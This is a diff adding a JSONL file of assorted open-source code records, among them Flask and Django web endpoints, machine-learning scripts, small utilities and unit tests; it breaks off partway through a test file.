diff --git "a/2881.jsonl" "b/2881.jsonl" new file mode 100644--- /dev/null +++ "b/2881.jsonl" @@ -0,0 +1,739 @@ +{"seq_id":"307514439","text":"from flask import Flask, json, request\nfrom app.book.service import Service\nfrom flask_cors import CORS\n\napp = Flask(__name__)\nCORS(app)\n\n\n@app.route(\"/books\", methods=[\"GET\"])\ndef list_books():\n return json_response(Service().find_books())\n\n\n@app.route(\"/books_by_genre\", methods=[\"GET\"])\n# listing books by the given genre\ndef list_books_by_genre():\n genre = request.args.get(\"genre\")\n return json_response(Service().find_books_by_genre(genre))\n\n\n@app.route(\"/search_by_name\", methods=[\"GET\"])\n# searching book by the given book name\ndef search_books_by_name():\n book_name = request.args.get(\"book_name\")\n return json_response(Service().search_books_by_keyword(book_name))\n\n\n@app.route('/add_new_book', methods=['POST'])\ndef add_book():\n book_id = request.args.get(\"book_id\")\n book_name = request.args.get(\"book_name\")\n author = request.args.get(\"author\")\n genre = request.args.get(\"genre\")\n book_obj = Service().create_book(book_id, book_name, author, genre)\n return json_response(book_obj)\n\n\n@app.route('/update_book', methods=['PUT'])\ndef update_book():\n book_id = request.args.get(\"book_id\")\n book_name = request.args.get(\"book_name\")\n author = request.args.get(\"author\")\n genre = request.args.get(\"genre\")\n book_obj = Service().update_book(book_id, book_name, author, genre)\n return json_response(book_obj)\n\n\n@app.route('/delete_book', methods=['DELETE'])\ndef delete():\n service = Service()\n book_id = request.args.get(\"book_id\")\n\n if service.delete_book(book_id):\n return json_response({'Result': 'Successfully Deleted'})\n else:\n return json_response({'Error': 'Book not found'}, 404)\n\n\ndef json_response(payload, status=200):\n # we returned all endpoints with this method to stabilize our format,\n # it will be consume by angular services in front-end side\n return json.dumps(payload), status, {'content-type': 'application/json'}\n","sub_path":"app/api/endpoints.py","file_name":"endpoints.py","file_ext":"py","file_size_in_byte":1926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"16619750","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.ensemble import RandomForestClassifier\nfrom flaskr.models.base_model import BaseModel\nfrom config import Config as config\n\nMODEL_TYPES = config.MODEL_TYPES\n\n\nclass RandomForest(BaseModel):\n def __init__(self, model_type=MODEL_TYPES[0], model_name=\"random_forest\", candle_size=60, market_info=None, train_daterange=None, lag=0, rolling_step=0, features=[\"close\", \"omlbct\"], label=\"omlbct\"):\n BaseModel.__init__(self,\n model_type=model_type,\n model_name=model_name,\n candle_size=candle_size,\n market_info=market_info,\n train_daterange=train_daterange,\n lag=lag,\n rolling_step=rolling_step,\n features=features,\n label=label)\n self.model = RandomForestClassifier(n_estimators=500)\n \n def train(self, x_train, y_train):\n self.model.fit(x_train, y_train)\n\n def predict(self, x_predict=np.array([])):\n return self.model.predict(x_predict)\n","sub_path":"flaskr/models/random_forest.py","file_name":"random_forest.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"5769339","text":"\"\"\"\nQ042\nTrapping Rain Water\nHard\n09/29/2021\n\n:stack:two pointer:array: DP:\n\nGiven n non-negative integers representing an elevation map\nwhere the width of each bar is 1, compute how much water it\nis able to trap after raining.\n\n\"\"\"\n\nfrom typing import List\n\n\nclass Solution:\n def trap(self, height: List[int]) -> int:\n # DP\n # pass\n total = 0\n left = [height[0]]\n right = [height[-1]]\n for i in range(1, len(height)):\n left.append(max(left[-1], height[i]))\n right.append(max(right[-1], height[len(height)-1-i]))\n\n right = right[::-1]\n\n for i in range(1, len(height)-1):\n total += max(0, min(left[i-1], right[i+1])-height[i])\n\n return total\n\n\n\na = [4,2,3]\na2 = [0,1,0,2,1,0,1,3,2,1,2,1]\nsol = Solution()\nprint(sol.trap(a2))\n\n\n\n\n","sub_path":"Q042-v4.py","file_name":"Q042-v4.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"80478647","text":"import json\nimport urllib.parse\nfrom http.client import HTTPConnection\nfrom typing import NamedTuple, Optional, Tuple\n\n\nclass Credentials(NamedTuple):\n username: str\n password: str\n\n\nAUTH_PATH = \"/login\"\n\n\nclass Communicator:\n \"\"\"Sends requests to an HTTP server.\"\"\"\n host: str\n port: int\n creds: Optional[Credentials]\n token: Optional[str]\n\n def __init__(self, host: str, port: int):\n self.host = host\n self.port = port\n self.creds = None\n self.token = None\n\n def authenticate(self) -> bool:\n \"\"\"\n Requests a new auth token.\n Returns True iff the authentication was successful.\n \"\"\"\n if self.creds is None:\n return False\n\n status, data = self.send_request(\n path=AUTH_PATH,\n method=\"POST\",\n data={\n \"username\": self.creds.username,\n \"password\": self.creds.password,\n },\n retry_auth=False,\n )\n\n if not 200 <= status < 300:\n return False\n\n self.token = data[\"token\"]\n return True\n\n def send_request(\n self,\n path: str,\n method: str,\n data: Optional[dict] = None,\n retry_auth=True,\n ) -> Tuple[int, dict]:\n \"\"\"\n Sends an HTTP request.\n\n Parameters\n ----------\n - path:\n The path of the request URL relative to the host.\n - method:\n The HTTP method of the request.\n - data (optional):\n The body of the HTTP request.\n\n Returns\n -------\n A tuple of HTTP status number and response body.\n \"\"\"\n path = urllib.parse.quote(path)\n\n try:\n conn = HTTPConnection(\n host=self.host,\n port=self.port,\n )\n params = {}\n\n if data is not None:\n params[\"body\"] = json.dumps(data)\n\n headers = {}\n\n if self.token is not None:\n headers[\"Auth-Token\"] = self.token\n\n conn.request(\n method=method,\n url=path,\n headers=headers,\n **params,\n )\n res = conn.getresponse()\n response_data = res.read()\n\n if res.status == 401 and retry_auth:\n # try to get a new token:\n\n if self.authenticate():\n return self.send_request(\n path=path,\n method=method,\n data=data,\n retry_auth=False,\n )\n\n return res.status, json.loads(response_data)\n finally:\n conn.close()\n","sub_path":"Client/communicator.py","file_name":"communicator.py","file_ext":"py","file_size_in_byte":2767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"610264247","text":"#A neural netowrk with 2 hidden layers that is trained on the MNIST data\n\n#Construct the neural netowork:\nimport tensorflow as tf\n\nn_inputs = 28*28 #size of MNIST images\nn_hidden1 = 300 #number of nodes in first hidden layer\nn_hidden2 = 100 #Number of nodes in second hidden layer\nn_outputs = 10 #Number of outputs, one for each digit 1,..,10\n\nlearning_rate = 0.01\n\n#Create placeholder for the data - this functions as an input layer, and will be replaced by data during execution\nX = tf.placeholder(tf.float32, shape = (None,n_inputs), name = 'X')\ny = tf.placeholder(tf.int64, shape = (None), name = 'y')\n\n#Create two hidden layers and an output layer\n#The hidden layers use the ReLu actuivation function, the output layer uses the softmax activation\nhidden1 = tf.layers.dense(inputs=X, units=n_hidden1, activation=tf.nn.relu, name='hidden1')\nhidden2 = tf.layers.dense(inputs=hidden1, units=n_hidden2, activation=tf.nn.relu, name='hidden2')\noutputs = tf.layers.dense(inputs=hidden2, units=n_outputs, name='outputs')\n\n#Use cross entropy cost function.\n#Compute the cross-entropy for each example in a 1-D tensor. \n#This takes the outputs berofe the softmax function is applied (the logits), and applies the softmax itself\n#The function is more effient thaan appling the softmax activation and then computing the cross-entropy manually\nlosses = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=y, logits=outputs)\n#Compute the mean cross entropy over all examples\ncost = tf.reduce_mean(input_tensor=losses, name='cost')\n\n#define a GradientDescentOptimizer to update the model paramaters to minimize the cost funtion \noptimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)\ntraining_op = optimizer.minimize(cost)\n\n#Evaluate the model using accuracy\n#Check if the highest logit corresponds to the true class for each example. Returns a 1-D tensor of boolean values\ncorrect = tf.nn.in_top_k(predictions=outputs, targets=y, k=1)\n#cast boolean values to floats, and compute their average\naccuracy = tf.reduce_mean(tf.cast(correct, tf.float32)) #This is the network's overall accuracy\n\n#Create an initializer to initialize all variables\ninit = tf.global_variables_initializer()\n\n#Run the neural netowrk on MNIST data:\nn_epochs = 40\nbatch_size = 50 #For mini batch Gradient Descent\n\n#Get the data and scale it (between 0 and 1)\nfrom tensorflow.examples.tutorials.mnist import input_data\nmnist = input_data.read_data_sets(\"'tmp'data/\")\n\nwith tf.Session() as sess: #Start a tensor flow session\n init.run() #run the init code that initializes all the variables\n for epoch in range(n_epochs):\n #The training loop:\n \n #Mini Batch GD:\n for iteration in range(mnist.train.num_examples//batch_size):\n X_batch, y_batch = mnist.train.next_batch(batch_size) #fetches each new mini-batch\n sess.run(training_op,feed_dict={X:X_batch, y:y_batch}) #feeds the current mini-batch to the network and runs the trainig operation\n train_acc = accuracy.eval(feed_dict={X:X_batch,y:y_batch}) #evaluated on the last mini-batch\n test_acc = accuracy.eval(feed_dict={X:mnist.test.images,y:mnist.test.labels}) #evaluated on the whole test ste\n\n# #Batch GD: \n# sess.run(training_op, feed_dict={X:mnist.train.images,y:mnist.train.labels}) #feeds the entire training set, an druns the training operation\n# train_acc = accuracy.eval(feed_dict={X:mnist.train.images,y:mnist.train.labels}) #evaluated on the whole training set\n# test_acc = accuracy.eval(feed_dict={X:mnist.test.images,y:mnist.test.labels}) #evaluated on the whole test set\n\n print(epoch, 'train accuracy: ', train_acc, 'test accuracy: ', test_acc)\n \n#Results:\n#Batch GD:\n#39 train accuracy: 0.39807272 test accuracy: 0.4119\n#Mini Batch GD: \n#39 train accuracy: 1.0 test accuracy: 0.9787\n \n\n \n","sub_path":"nn_TensorFlow_practice.py","file_name":"nn_TensorFlow_practice.py","file_ext":"py","file_size_in_byte":3870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"366572074","text":"from time import sleep\nimport requests\nimport serial\n\n# Configuration\n# USB port - Adruino USB connection to PC\nusb_serial_port = \"COM3\"\n\n# Website host address\nhost= \"http://localhost/Water-Quality-Monitoring-System-Website/\" # End url with a slash '/'\n\nser = serial.Serial(usb_serial_port,9600)\nwhile True:\n\tgetVal = ser.readline()\n\tval = str(getVal).replace(\"b'\",\"\").replace(\"\\\\r\\\\n'\",\"\")\n\tarr = val.split(\",\")\n\tprint(arr)\n\n\t# send to web server (php)\n\tuserdata = {\"temperature\": arr[0], \"turbidity\": arr[1], \"ph\": arr[2]}\n\tresp = requests.post(host + \"insert_data.php\", params=userdata)","sub_path":"Water-Quality-Website/serialread.py","file_name":"serialread.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"212311788","text":"###########################################################################\n# TextIndexNG V 3 \n# The next generation TextIndex for Zope\n#\n# This software is governed by a license. See\n# LICENSE.txt for the terms of this license.\n###########################################################################\n\n\"\"\"\nA stupid HTML to Ascii converter\n\n$Id: sgml.py 2055 2009-03-14 10:13:45Z ajung $\n\"\"\"\n\nimport re\nimport sys\nfrom zopyx.txng3.core.baseconverter import BaseConverter\nfrom StripTagParser import StripTagParser\nfrom entities import convert_entities\n\ndefault_encoding = sys.getdefaultencoding()\nencoding_reg = re.compile('encoding=\"(.*?)\"')\n\nclass Converter(BaseConverter):\n\n content_type = ('text/sgml', 'text/xml')\n content_description = \"SGML, XML\"\n\n def convert(self, doc):\n \"\"\"Convert html data to raw text\"\"\"\n\n p = StripTagParser()\n p.feed(doc)\n p.close()\n return str(p)\n\n def convert(self, doc, encoding, mimetype,\n logError=False, raiseException=False):\n\n # Use encoding from XML preamble if present\n mo = encoding_reg.search(doc)\n if mo:\n encoding = mo.group(1)\n\n if not encoding:\n encoding = default_encoding\n \n if not isinstance(doc, unicode):\n doc = unicode(doc, encoding, 'replace')\n doc = convert_entities(doc)\n doc = doc.encode('utf-8')\n p = StripTagParser()\n p.feed(doc)\n p.close()\n return str(p), 'utf-8'\n\nSGMLConverter = Converter()\n","sub_path":"zopyx/txng3/core/converters/sgml.py","file_name":"sgml.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"300156430","text":"from PIL import Image\r\n\r\n# ascii characters used\r\nascii_chars = [\"@\", \"#\", \"$\", \"%\", \"?\", \"*\", \"+\", \";\", \":\", \",\", \".\"]\r\n\r\n\r\n# resizing the image\r\ndef resize_image(image, new_width=25):\r\n width, height = image.size\r\n ratio = height / width\r\n new_height = int(new_width * ratio)\r\n resized_image = image.resize((new_width, new_height))\r\n return (resized_image)\r\n\r\n\r\n# converting image into greyscale\r\ndef grayscale(image):\r\n grayscale_image = image.convert(\"L\")\r\n return (grayscale_image)\r\n\r\n\r\n# convert each pixel into a corresponding ASCII Character\r\ndef pixels_to_ascii(image):\r\n pixels = image.getdata()\r\n characters = \"\".join([ascii_chars[pixel // 25] for pixel in pixels])\r\n return (characters)\r\n\r\n\r\ndef main(new_width=25):\r\n # take the image from the user\r\n path = input('Enter a valid pathname to the image: ')\r\n try:\r\n image = Image.open(path)\r\n except:\r\n print(path, 'is not a valid pathname to the image')\r\n\r\n# convert image into ascii\r\n new_image_data = pixels_to_ascii(grayscale(resize_image(image)))\r\n\r\n# format\r\n pixel_count = len(new_image_data)\r\n ascii_image = '\\n'.join(new_image_data[i:(i + new_width)] for i in range(0, pixel_count, new_width))\r\n\r\n# print result\r\n print(ascii_image)\r\n\r\n# save result to a txt file\r\n with open(\"ascii_image.txt\",\"w\") as f:\r\n f.write(ascii_image)\r\n\r\nmain()\r\n","sub_path":"ASCII art.py","file_name":"ASCII art.py","file_ext":"py","file_size_in_byte":1386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"637930388","text":"import csv\nimport os.path\nimport sys\nimport glob\n\ndirname = str(sys.argv[1])\nfor filename in glob.glob(dirname + '*.csv'):\n htmlname = os.path.splitext(os.path.dirname(filename))[0] + \"/html/\" + os.path.splitext(os.path.basename(filename))[0] + \"_v2.html\"\n basename = os.path.splitext(os.path.basename(filename))[0]\n\n csvFile = open(filename)\n csvReader = csv.reader(csvFile)\n csvData = list(csvReader)\n\n with open(htmlname, 'w') as html:\n html.write('\\r')\n #html.write('
\\r')\n #html.write('

' + basename + '

\\r

Decriptive Text

\\r')\n html.write('
\\r\\r')\n\n r = 0\n for row in csvData:\n print(row)\n if r == 0:\n print(\"FIRST ROW\")\n html.write('\\r\\r')\n for col in row:\n html.write('\\r')\n html.write('\\r\\r')\n html.write('\\r')\n else:\n html.write('\\r')\n c = 0\n for col in row:\n if c == 0:\n html.write('\\r')\n else:\n html.write('\\r')\n c += 1\n\n html.write('\\r')\n\n r += 1\n\n html.write('\\r
' + col + '
' + col + '' + col + '
\\r
\\r\\r')\n #html.write('
\\r\\r')\n html.write('\\r')\n","sub_path":"columbia-igem-master/py/csv_to_bootstrap.py","file_name":"csv_to_bootstrap.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"631004093","text":"#maria francisca gutierrez hernandez 24/09/19\r\n\r\n#Leer un archivo externo\r\n'''file=open(\"devices.txt\",\"r\")\r\nfor item in file:\r\n print(item)\r\nfile.close()'''\r\n\r\n\r\n#eliminar lineas\r\n'''file=open(\"devices.txt\",\"r\")\r\nfor item in file:\r\n item=item.strip()\r\n print(item)\r\nfile.close()'''\r\n\r\n#copiar en una lista\r\n'''devices=[]\r\nfile=open(\"devices.txt\",\"r\")\r\nfor item in file:\r\n item=item.strip()\r\n devices.append(item)\r\nfile.close()\r\nprint(devices)'''\r\n\r\n#agregar dispositivos\r\nfile = open(\"devices.txt\", \"a\")\r\nwhile True:\r\n newItem = input(\"Ingrese el nombre del dispositivo, si desea salir escriba (salir):\")\r\n if newItem == \"salir\":\r\n print(\"¡Todo listo!\")\r\n break\r\n file.write(newItem + \"\\n\")\r\nfile.close()\r\n\r\n","sub_path":"unidad_1/actividad_7/07_file-access_maria-francisca-gh.py","file_name":"07_file-access_maria-francisca-gh.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"640201514","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\nfrom scipy.stats import entropy\nimport torch\nfrom torch import nn\nfrom torch.autograd import Variable\nfrom torch.nn import functional as F\nimport torch.utils.data\nfrom torchvision import transforms\nfrom torchvision.models.inception import inception_v3\n\nimport os.path\nimport scipy.misc\n# from torchsummary import summary\n\n\ndef preprocess(img):\n # print('img', img.shape, img.max(), img.min())\n # img = Image.fromarray(img, 'RGB')\n if len(img.shape) == 2:\n img = np.resize(img, (img.shape[0], img.shape[1], 3))\n img = scipy.misc.imresize(img, (299, 299, 3),\n interp='bilinear')\n img = img.astype(np.float32)\n # [0, 255] --> [0, 1] --> [-1, 1]\n img = img / 127.5 - 1.\n img = np.moveaxis(img,-1,0)\n # print('img', img.shape, img.max(), img.min())\n return img\n\n\ndef load_data(fullpath):\n print(fullpath)\n images = []\n for path, subdirs, files in os.walk(fullpath):\n for name in files:\n if name.rfind('jpg') != -1 or name.rfind('png') != -1:\n filename = os.path.join(path, name)\n # print('filename', filename)\n # print('path', path, '\\nname', name)\n # print('filename', filename)\n if os.path.isfile(filename):\n img = scipy.misc.imread(filename)\n img = preprocess(img)\n images.append(img)\n print('images', len(images), images[0].shape)\n return images\n\n\ndef inception_score(imgs, cuda=True, batch_size=32, resize=False, splits=10):\n \"\"\"Computes the inception score of the generated images imgs\n\n imgs -- Torch dataset of (3xHxW) numpy images normalized in the range [-1, 1]\n cuda -- whether or not to run on GPU\n batch_size -- batch size for feeding into Inception v3\n splits -- number of splits\n \"\"\"\n N = len(imgs)\n\n assert batch_size > 0\n assert N > batch_size\n\n # Set up dtype\n if cuda:\n dtype = torch.cuda.FloatTensor\n else:\n if torch.cuda.is_available():\n print(\"WARNING: You have a CUDA device, so you should probably set cuda=True\")\n dtype = torch.FloatTensor\n\n # Set up dataloader\n dataloader = torch.utils.data.DataLoader(imgs, batch_size=batch_size)\n\n # Load inception model\n inception_model = inception_v3(pretrained=True, transform_input=False).type(dtype)\n inception_model.eval();\n up = nn.Upsample(size=(299, 299), mode='bilinear').type(dtype)\n def get_pred(x):\n if resize:\n x = up(x)\n x = inception_model(x)\n return F.softmax(x).data.cpu().numpy()\n\n # Get predictions\n preds = np.zeros((N, 1000))\n\n for i, batch in enumerate(dataloader, 0):\n batch = batch.type(dtype)\n batchv = Variable(batch)\n batch_size_i = batch.size()[0]\n\n preds[i*batch_size:i*batch_size + batch_size_i] = get_pred(batchv)\n\n # Now compute the mean kl-div\n split_scores = []\n\n for k in range(splits):\n part = preds[k * (N // splits): (k+1) * (N // splits), :]\n py = np.mean(part, axis=0)\n scores = []\n for i in range(part.shape[0]):\n pyx = part[i, :]\n scores.append(entropy(pyx, py))\n split_scores.append(np.exp(np.mean(scores)))\n\n return np.mean(split_scores), np.std(split_scores)\n\n\nif __name__ == '__main__':\n num_classes = 50 + 1 # number of classes\n fullpath = \"results/output/oxford_2019_02_21_11_20_08\"\n\n images = load_data(fullpath)\n\n print(inception_score(images))\n","sub_path":"inception_score.py","file_name":"inception_score.py","file_ext":"py","file_size_in_byte":3652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"597317950","text":"# -*- coding: utf-8 -*-\nfrom django.conf.urls import patterns, include, url\nfrom django.contrib import admin\nfrom ikwen.flatpages.views import FlatPageView\n\nfrom blog.views import PostsList, PostDetails, save_comment, Search, AdminHome, PostPerCategory, get_media, delete_photo\n\nadmin.autodiscover()\n\nurlpatterns = patterns(\n '',\n url(r'^(?P[-\\w]+)/$', PostDetails.as_view(), name='details'),\n url(r'^search$', Search.as_view(), name='search'),\n url(r'^category/(?P[-\\w]+)/$', PostPerCategory.as_view(), name='post_per_category'),\n url(r'^yommax/$', AdminHome.as_view(), name='admin_home'),\n url(r'^$', PostsList.as_view(), name='home'),\n url(r'^save_comment$', save_comment, name='save_comment'),\n url(r'^get_media$', get_media, name='get_media'),\n url(r'^delete_photo$', delete_photo, name='delete_photo'),\n)","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"192314243","text":"import models\nimport views\nimport flask\n\nfrom controllers import Paginator\nfrom controllers.auth import current_user\n\nbp = flask.Blueprint(__name__, 'reviews')\n\n\n@bp.route('/film/')\ndef list_by_film(id_):\n user = current_user()\n if user is None:\n return flask.Response(status=401)\n pag = Paginator()\n query = models.Review.query.filter_by(film=id_)\n query = pag.apply(query)\n lst = [\n views.review.view(model)\n for model in query\n ]\n return flask.jsonify(\n pag.wrap({\n 'reviews': lst\n })\n )\n\n\n@bp.route('/film/', methods=['POST'])\ndef review_film(id_):\n user = current_user()\n if user is None:\n return flask.Response(status=401)\n text = flask.request.values['text']\n review = models.Review(user.id, id_, text)\n models.db.session.add(review)\n models.db.session.commit()\n return flask.jsonify(views.review.view(review))\n","sub_path":"lab2/controllers/review.py","file_name":"review.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"279425142","text":"import unittest\nimport logging\nfrom collector.requesting import InvocationRequest\nfrom collector.requesting import Target\nfrom collector.requesting import SpaceName\nfrom collector.triggers import Find\nfrom collector.triggers import FetchAttribute\nfrom collector.triggers import RetrieveTags\nfrom collector.triggers import TagType\nfrom collector.triggers import SelectElement\nfrom collector.triggers import SetWorkspace\nfrom collector.executing import ExecutionOrderEntry\nfrom collector.executing import ExecutionOrder\nfrom collector.executing import InfoCollector\nfrom collector.helpers import configure_logging\nfrom collector.helpers import decode_base64\nfrom collector.helpers import get_web_space\nfrom collector.helpers import fetch_html\nfrom collector.helpers import get_entry_for_dobreprogramy_pl\n\nconfigure_logging(r\"../test_log.txt\")\nlogging.debug(\"Tests for: Blizzard Battle.net\")\n\n\nclass BlizzardBattleNetTestData:\n APP_NAME = \"Blizzard Battle.net\"\n WEB_SPACE_URL_1 = \"https://eu.battle.net/account/download/\"\n WEB_SPACE_URL_2 = \"https://www.dobreprogramy.pl/Blizzard-Battle.net,Program,Windows,99372.html\"\n WEB_SPACE_URL_3 = \"https://www.dobreprogramy.pl/Blizzard-Battle.net,Program,Mac,99373.html\"\n WEB_SPACE_HTML_PATH_1 = r\"../resources/battleNet_web_URL.base64\"\n WEB_SPACE_HTML_PATH_2 = r\"../resources/battleNet_web_Windows.base64\"\n WEB_SPACE_HTML_PATH_3 = r\"../resources/battleNet_web_Mac.base64\"\n\n def __init__(self):\n self.execution_order = ExecutionOrder()\n self.execution_order.add_entry(get_entry_1(), True)\n self.execution_order.add_entry(get_entry_2(), True)\n self.execution_order.add_entry(get_entry_3(), True)\n self.execution_order.add_entry(get_entry_4(), True)\n win_exe_engb = b'aHR0cHM6Ly93d3cuYmF0dGxlLm5ldC9kb3dubG9hZC9nZXRJbnN0YWxsZXJGb3JHYW1lP29zPXdpbiZhbXA7bG9jYWx' \\\n b'lPWVuR0ImYW1wO3ZlcnNpb249TElWRSZhbXA7Z2FtZVByb2dyYW09QkFUVExFTkVUX0FQUA=='\n win_exe_plpl = b'aHR0cHM6Ly93d3cuYmF0dGxlLm5ldC9kb3dubG9hZC9nZXRJbnN0YWxsZXJGb3JHYW1lP29zPXdpbiZhbXA7bG9jYWx' \\\n b'lPXBsUEwmYW1wO3ZlcnNpb249TElWRSZhbXA7Z2FtZVByb2dyYW09QkFUVExFTkVUX0FQUA=='\n mac_zip_enus = b'aHR0cHM6Ly93d3cuYmF0dGxlLm5ldC9kb3dubG9hZC9nZXRJbnN0YWxsZXJGb3JHYW1lP29zPW1hYyZhbXA7bG9jYWx' \\\n b'lPWVuVVMmYW1wO3ZlcnNpb249TElWRSZhbXA7Z2FtZVByb2dyYW09QkFUVExFTkVUX0FQUA=='\n mac_zip_plpl = b'aHR0cHM6Ly93d3cuYmF0dGxlLm5ldC9kb3dubG9hZC9nZXRJbnN0YWxsZXJGb3JHYW1lP29zPW1hYyZhbXA7bG9jYWx' \\\n b'lPXBsUEwmYW1wO3ZlcnNpb249TElWRSZhbXA7Z2FtZVByb2dyYW09QkFUVExFTkVUX0FQUA=='\n self.expected_win_exe_engb = decode_base64(win_exe_engb)\n self.expected_win_exe_plpl = decode_base64(win_exe_plpl)\n self.expected_mac_zip_enus = decode_base64(mac_zip_enus)\n self.expected_mac_zip_plpl = decode_base64(mac_zip_plpl)\n self.expected_win_ver = decode_base64(b'MS4xNi4w')\n self.expected_win_date = decode_base64(b'MjAxOS0wMi0wOA==')\n self.expected_win_size = decode_base64(b'NCw0OSBNQg==')\n self.expected_mac_ver = str()\n self.expected_mac_date = decode_base64(b'MjAxOC0xMi0zMQ==')\n self.expected_mac_size = decode_base64(b'MywwMSBNQg==')\n\n\nclass TestDataOnline(BlizzardBattleNetTestData):\n def __init__(self):\n super().__init__()\n self.execution_order.list[0].html_data = fetch_html(self.WEB_SPACE_URL_1)\n self.execution_order.list[1].html_data = fetch_html(self.WEB_SPACE_URL_2)\n self.execution_order.list[2].html_data = fetch_html(self.WEB_SPACE_URL_3)\n\n\ndef get_entry_1():\n req_01 = InvocationRequest(Target(SpaceName.WEB), Find(\"gameProgram[bnetapp]\"))\n req_02 = InvocationRequest(Target(SpaceName.WORK), RetrieveTags(\"a\", TagType.ATTRIBUTED, 28))\n req_03 = InvocationRequest(Target(SpaceName.LIST), SelectElement(3))\n req_04 = InvocationRequest(Target(SpaceName.WORK, True, \"Win_exe_enGB\"), FetchAttribute(\"href\"))\n req_05 = InvocationRequest(Target(SpaceName.LIST), SelectElement(10))\n req_06 = InvocationRequest(Target(SpaceName.WORK, True, \"Win_exe_plPL\"), FetchAttribute(\"href\"))\n req_07 = InvocationRequest(Target(SpaceName.LIST), SelectElement(14))\n req_08 = InvocationRequest(Target(SpaceName.WORK, True, \"Mac_zip_enUS\"), FetchAttribute(\"href\"))\n req_09 = InvocationRequest(Target(SpaceName.LIST), SelectElement(24))\n req_10 = InvocationRequest(Target(SpaceName.WORK, True, \"Mac_zip_plPL\"), FetchAttribute(\"href\"))\n chain_request_1 = (req_01, req_02, req_03, req_04, req_05, req_06, req_07, req_08, req_09, req_10)\n entry_1 = ExecutionOrderEntry(chain_request_1, get_web_space(BlizzardBattleNetTestData.WEB_SPACE_HTML_PATH_1))\n return entry_1\n\n\ndef get_entry_2():\n web_space = get_web_space(BlizzardBattleNetTestData.WEB_SPACE_HTML_PATH_2)\n return get_entry_for_dobreprogramy_pl(web_space, \"Win_ver\", \"Win_date\", \"Win_size\")\n\n\ndef get_entry_3():\n web_space = get_web_space(BlizzardBattleNetTestData.WEB_SPACE_HTML_PATH_3)\n return get_entry_for_dobreprogramy_pl(web_space, \"Mac_ver\", \"Mac_date\", \"Mac_size\", (-1, -1))\n\n\ndef get_entry_4():\n app_website = BlizzardBattleNetTestData.WEB_SPACE_URL_1\n req_1 = InvocationRequest(Target(SpaceName.WORK, True, \"app_website\"), SetWorkspace(app_website))\n chain_request = (req_1,)\n return ExecutionOrderEntry(chain_request, str())\n\n\nclass ActivisionBlizzardBattleNetTest(unittest.TestCase):\n def test_package_collecting(self):\n # given\n dt = BlizzardBattleNetTestData()\n collector = InfoCollector(dt.APP_NAME, dt.execution_order)\n\n # when\n collector.collect()\n\n # then\n self.assertEqual(dt.APP_NAME, collector.get_app_name())\n self.assertEqual(dt.expected_win_exe_engb, collector.get_collectibles()['Win_exe_enGB'])\n self.assertEqual(dt.expected_win_exe_plpl, collector.get_collectibles()['Win_exe_plPL'])\n self.assertEqual(dt.expected_mac_zip_enus, collector.get_collectibles()['Mac_zip_enUS'])\n self.assertEqual(dt.expected_mac_zip_plpl, collector.get_collectibles()['Mac_zip_plPL'])\n self.assertEqual(dt.expected_win_ver, collector.get_collectibles()['Win_ver'])\n self.assertEqual(dt.expected_win_date, collector.get_collectibles()['Win_date'])\n self.assertEqual(dt.expected_win_size, collector.get_collectibles()['Win_size'])\n self.assertEqual(dt.expected_mac_ver, collector.get_collectibles()['Mac_ver'])\n self.assertEqual(dt.expected_mac_date, collector.get_collectibles()['Mac_date'])\n self.assertEqual(dt.expected_mac_size, collector.get_collectibles()['Mac_size'])\n self.assertEqual(dt.WEB_SPACE_URL_1, collector.get_collectibles()['app_website'])\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"collector/tests/executing/app_blizzard_battle_net_test.py","file_name":"app_blizzard_battle_net_test.py","file_ext":"py","file_size_in_byte":6788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"464307712","text":"from unittest import TestCase\nfrom unittest.mock import patch\n\nfrom opwen_email_server.api import client_read\nfrom tests.opwen_email_server.api.api_test_base import AuthTestMixin\n\n\nclass DownloadTests(TestCase, AuthTestMixin):\n def test_denies_unknown_client(self):\n with self.given_clients(client_read, {'client1': 'bar.com'}):\n message, status = client_read.download('unknown')\n self.assertEqual(status, 403)\n\n @patch.object(client_read, 'server_datastore')\n @patch.object(client_read, 'STORAGE')\n def test_uploads_emails_and_marks_as_delivered(\n self, storage_mock, datastore_mock):\n\n with self.given_clients(client_read, {'client1': 'bar.com'}):\n resource_id = '1234'\n emails = [{'to': 'foo@bar.com', '_uid': '1'},\n {'to': 'bar@bar.com', '_uid': '2'}]\n self.given_index(datastore_mock, storage_mock, emails, resource_id)\n\n response = client_read.download('client1')\n\n self.assertEqual(resource_id, response.get('resource_id'))\n self.assertEqual(self.stored_ids, emails)\n datastore_mock.mark_emails_as_delivered.\\\n assert_called_once_with('bar.com', {'1', '2'})\n\n def given_index(self, 